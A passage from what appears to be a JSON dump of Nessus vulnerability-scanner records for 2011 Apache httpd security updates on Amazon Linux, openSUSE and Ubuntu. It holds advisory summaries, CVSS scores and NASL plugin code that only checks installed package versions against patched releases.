(rpm_check(release:\"ALA\", reference:\"mod_ssl-2.2.21-1.19.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-tools / etc\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-04-19T17:13:26", "description": "This update fixes several security issues in the Apache webserver.\n\nThe patch for the ByteRange remote denial of service attack (CVE-2011-3192) was refined and the configuration options used by upstream were added. 
Introduce new config option: Allow MaxRanges Number of ranges requested, if exceeded, the complete content is served. default: 200 0|unlimited: unlimited none: Range headers are ignored. This option is a backport from 2.2.21.\n\nAlso fixed: CVE-2011-3348: Denial of service in proxy_ajp when using a undefined method.\n\nCVE-2011-3368: Exposure of internal servers via reverse proxy methods with mod_proxy enabled and incorrect Rewrite or Proxy Rules.", "cvss3": {"score": null, "vector": null}, "published": "2014-06-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : apache2 (openSUSE-SU-2011:1217-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3192", "CVE-2011-3348", "CVE-2011-3368"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:apache2", "p-cpe:/a:novell:opensuse:apache2-debuginfo", "p-cpe:/a:novell:opensuse:apache2-debugsource", "p-cpe:/a:novell:opensuse:apache2-devel", "p-cpe:/a:novell:opensuse:apache2-example-certificates", "p-cpe:/a:novell:opensuse:apache2-example-pages", "p-cpe:/a:novell:opensuse:apache2-itk", "p-cpe:/a:novell:opensuse:apache2-itk-debuginfo", "p-cpe:/a:novell:opensuse:apache2-prefork", "p-cpe:/a:novell:opensuse:apache2-prefork-debuginfo", "p-cpe:/a:novell:opensuse:apache2-utils", "p-cpe:/a:novell:opensuse:apache2-utils-debuginfo", "p-cpe:/a:novell:opensuse:apache2-worker", "p-cpe:/a:novell:opensuse:apache2-worker-debuginfo", "cpe:/o:novell:opensuse:11.4"], "id": "SUSE_11_4_APACHE2-111026.NASL", "href": "https://www.tenable.com/plugins/nessus/75787", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update apache2-5347.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75787);\n script_version(\"1.6\");\n 
script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-3192\", \"CVE-2011-3348\", \"CVE-2011-3368\");\n\n script_name(english:\"openSUSE Security Update : apache2 (openSUSE-SU-2011:1217-1)\");\n script_summary(english:\"Check for the apache2-5347 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes several security issues in the Apache webserver.\n\nThe patch for the ByteRange remote denial of service attack\n(CVE-2011-3192) was refined and the configuration options used by\nupstream were added. Introduce new config option: Allow MaxRanges\nNumber of ranges requested, if exceeded, the complete content is\nserved. default: 200 0|unlimited: unlimited none: Range headers are\nignored. This option is a backport from 2.2.21.\n\nAlso fixed: CVE-2011-3348: Denial of service in proxy_ajp when using a\nundefined method.\n\nCVE-2011-3368: Exposure of internal servers via reverse proxy methods\nwith mod_proxy enabled and incorrect Rewrite or Proxy Rules.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=713966\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=719236\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=722545\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2011-11/msg00004.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", 
value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-example-certificates\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-example-pages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-itk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-itk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-prefork-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-utils-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 
and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.4)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.4\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-2.2.17-4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-debuginfo-2.2.17-4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-debugsource-2.2.17-4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-devel-2.2.17-4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-example-certificates-2.2.17-4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-example-pages-2.2.17-4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-itk-2.2.17-4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-itk-debuginfo-2.2.17-4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-prefork-2.2.17-4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-prefork-debuginfo-2.2.17-4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", 
reference:\"apache2-utils-2.2.17-4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-utils-debuginfo-2.2.17-4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-worker-2.2.17-4.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-worker-debuginfo-2.2.17-4.9.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-08-19T12:50:06", "description": "This update fixes several security issues in the Apache2 webserver.\n\nCVE-2011-3368, CVE-2011-4317: This update also includes several fixes for a mod_proxy reverse exposure via RewriteRule or ProxyPassMatch directives.\n\nCVE-2011-3607: Integer overflow in ap_pregsub function resulting in a heap based buffer overflow could potentially allow local attackers to gain privileges\n\nIn addition to that the following changes were made :\n\n - new template file:\n /etc/apache2/vhosts.d/vhost-ssl.template allow TLSv1 only, browser match stuff commented out.\n\n - rc script /etc/init.d/apache2: handle reload with deleted binaries by message to stdout only, but refrain from sending signals.", "cvss3": {"score": null, "vector": null}, "published": "2014-06-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : apache2 (openSUSE-SU-2012:0212-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3607", "CVE-2011-4317"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:apache2", "p-cpe:/a:novell:opensuse:apache2-debuginfo", "p-cpe:/a:novell:opensuse:apache2-debugsource", "p-cpe:/a:novell:opensuse:apache2-devel", "p-cpe:/a:novell:opensuse:apache2-example-certificates", 
"p-cpe:/a:novell:opensuse:apache2-example-pages", "p-cpe:/a:novell:opensuse:apache2-itk", "p-cpe:/a:novell:opensuse:apache2-itk-debuginfo", "p-cpe:/a:novell:opensuse:apache2-prefork", "p-cpe:/a:novell:opensuse:apache2-prefork-debuginfo", "p-cpe:/a:novell:opensuse:apache2-utils", "p-cpe:/a:novell:opensuse:apache2-utils-debuginfo", "p-cpe:/a:novell:opensuse:apache2-worker", "p-cpe:/a:novell:opensuse:apache2-worker-debuginfo", "cpe:/o:novell:opensuse:11.4"], "id": "SUSE_11_4_APACHE2-111205.NASL", "href": "https://www.tenable.com/plugins/nessus/75788", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update apache2-5520.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75788);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3607\", \"CVE-2011-4317\");\n\n script_name(english:\"openSUSE Security Update : apache2 (openSUSE-SU-2012:0212-1)\");\n script_summary(english:\"Check for the apache2-5520 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes several security issues in the Apache2 webserver.\n\nCVE-2011-3368, CVE-2011-4317: This update also includes several fixes\nfor a mod_proxy reverse exposure via RewriteRule or ProxyPassMatch\ndirectives.\n\nCVE-2011-3607: Integer overflow in ap_pregsub function resulting in a\nheap based buffer overflow could potentially allow local attackers to\ngain privileges\n\nIn addition to that the following changes were made :\n\n - new template file:\n /etc/apache2/vhosts.d/vhost-ssl.template allow TLSv1\n only, browser 
match stuff commented out.\n\n - rc script /etc/init.d/apache2: handle reload with\n deleted binaries by message to stdout only, but refrain\n from sending signals.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=722545\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=729181\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2012-02/msg00014.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-example-certificates\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-example-pages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-itk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-itk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-prefork-debuginfo\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-utils-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-worker-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.4)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.4\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-2.2.17-4.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-debuginfo-2.2.17-4.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", 
reference:\"apache2-debugsource-2.2.17-4.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-devel-2.2.17-4.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-example-certificates-2.2.17-4.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-example-pages-2.2.17-4.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-itk-2.2.17-4.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-itk-debuginfo-2.2.17-4.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-prefork-2.2.17-4.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-prefork-debuginfo-2.2.17-4.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-utils-2.2.17-4.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-utils-debuginfo-2.2.17-4.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-worker-2.2.17-4.11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-worker-debuginfo-2.2.17-4.11.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2 / apache2-devel / apache2-example-certificates / etc\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:59:42", "description": "It was discovered that the mod_proxy module in Apache did not properly interact with the RewriteRule and ProxyPassMatch pattern matches in the configuration of a reverse proxy. This could allow remote attackers to contact internal webservers behind the proxy that were not intended for external exposure. 
(CVE-2011-3368)\n\nStefano Nichele discovered that the mod_proxy_ajp module in Apache when used with mod_proxy_balancer in certain configurations could allow remote attackers to cause a denial of service via a malformed HTTP request. (CVE-2011-3348)\n\nSamuel Montosa discovered that the ITK Multi-Processing Module for Apache did not properly handle certain configuration sections that specify NiceValue but not AssignUserID, preventing Apache from dropping privileges correctly. This issue only affected Ubuntu 10.04 LTS, Ubuntu 10.10 and Ubuntu 11.04. (CVE-2011-1176)\n\nUSN 1199-1 fixed a vulnerability in the byterange filter of Apache.\nThe upstream patch introduced a regression in Apache when handling specific byte range requests. This update fixes the issue.\n\nA flaw was discovered in the byterange filter in Apache. A remote attacker could exploit this to cause a denial of service via resource exhaustion.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2011-11-11T00:00:00", "type": "nessus", "title": "Ubuntu 8.04 LTS / 10.04 LTS / 10.10 / 11.04 / 11.10 : apache2, apache2-mpm-itk vulnerabilities (USN-1259-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-1176", "CVE-2011-3348", "CVE-2011-3368"], "modified": "2019-09-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-itk", "p-cpe:/a:canonical:ubuntu_linux:apache2.2-bin", "p-cpe:/a:canonical:ubuntu_linux:apache2.2-common", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "cpe:/o:canonical:ubuntu_linux:10.10", "cpe:/o:canonical:ubuntu_linux:11.04", "cpe:/o:canonical:ubuntu_linux:11.10", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts"], "id": "UBUNTU_USN-1259-1.NASL", "href": "https://www.tenable.com/plugins/nessus/56778", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1259-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(56778);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/09/19 12:54:27\");\n\n script_cve_id(\"CVE-2011-1176\", \"CVE-2011-3348\", \"CVE-2011-3368\");\n script_bugtraq_id(46953, 49616, 49957);\n script_xref(name:\"USN\", value:\"1259-1\");\n\n script_name(english:\"Ubuntu 8.04 LTS / 10.04 LTS / 10.10 / 11.04 / 11.10 : apache2, apache2-mpm-itk vulnerabilities (USN-1259-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the mod_proxy module in Apache did not properly\ninteract with the RewriteRule and ProxyPassMatch pattern matches in\nthe configuration of a reverse proxy. This could allow remote\nattackers to contact internal webservers behind the proxy that were\nnot intended for external exposure. (CVE-2011-3368)\n\nStefano Nichele discovered that the mod_proxy_ajp module in Apache\nwhen used with mod_proxy_balancer in certain configurations could\nallow remote attackers to cause a denial of service via a malformed\nHTTP request. (CVE-2011-3348)\n\nSamuel Montosa discovered that the ITK Multi-Processing Module for\nApache did not properly handle certain configuration sections that\nspecify NiceValue but not AssignUserID, preventing Apache from\ndropping privileges correctly. This issue only affected Ubuntu 10.04\nLTS, Ubuntu 10.10 and Ubuntu 11.04. (CVE-2011-1176)\n\nUSN 1199-1 fixed a vulnerability in the byterange filter of Apache.\nThe upstream patch introduced a regression in Apache when handling\nspecific byte range requests. This update fixes the issue.\n\nA flaw was discovered in the byterange filter in Apache. 
A remote\nattacker could exploit this to cause a denial of service via resource\nexhaustion.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1259-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected apache2-mpm-itk, apache2.2-bin and / or\napache2.2-common packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-itk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2.2-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2.2-common\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/03/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/11\");\n 
script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2011-2019 Canonical, Inc. / NASL script (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(8\\.04|10\\.04|10\\.10|11\\.04|11\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 8.04 / 10.04 / 10.10 / 11.04 / 11.10\", \"Ubuntu \" + release);\nif ( ! 
get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"8.04\", pkgname:\"apache2.2-common\", pkgver:\"2.2.8-1ubuntu0.22\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"apache2-mpm-itk\", pkgver:\"2.2.14-5ubuntu8.7\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"apache2.2-bin\", pkgver:\"2.2.14-5ubuntu8.7\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"apache2-mpm-itk\", pkgver:\"2.2.16-1ubuntu3.4\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"apache2.2-bin\", pkgver:\"2.2.16-1ubuntu3.4\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"apache2-mpm-itk\", pkgver:\"2.2.17-1ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"apache2.2-bin\", pkgver:\"2.2.17-1ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"apache2.2-bin\", pkgver:\"2.2.20-1ubuntu1.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2-mpm-itk / apache2.2-bin / apache2.2-common\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:49:51", "description": "This update fixes several security issues in the Apache2 webserver.\n\nCVE-2011-3368, CVE-2011-4317: This update also includes several fixes for a mod_proxy reverse exposure via RewriteRule or ProxyPassMatch directives.\n\nCVE-2011-3607: Integer overflow in ap_pregsub function resulting in a heap based buffer overflow could potentially allow local attackers to gain privileges\n\nIn addition to that the following changes were made :\n\n - new 
template file:\n /etc/apache2/vhosts.d/vhost-ssl.template allow TLSv1 only, browser match stuff commented out.\n\n - rc script /etc/init.d/apache2: handle reload with deleted binaries by message to stdout only, but refrain from sending signals.\n\n- httpd-2.2.x-bnc727071-mod_authnz_ldap-utf8.diff: make non-ascii eg UTF8 passwords work with mod_authnz_ldap.\n[bnc#727071]", "cvss3": {"score": null, "vector": null}, "published": "2014-06-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : apache2 (openSUSE-SU-2012:0248-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3607", "CVE-2011-4317"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:apache2", "p-cpe:/a:novell:opensuse:apache2-devel", "p-cpe:/a:novell:opensuse:apache2-example-certificates", "p-cpe:/a:novell:opensuse:apache2-example-pages", "p-cpe:/a:novell:opensuse:apache2-itk", "p-cpe:/a:novell:opensuse:apache2-prefork", "p-cpe:/a:novell:opensuse:apache2-utils", "p-cpe:/a:novell:opensuse:apache2-worker", "cpe:/o:novell:opensuse:11.3"], "id": "SUSE_11_3_APACHE2-111205.NASL", 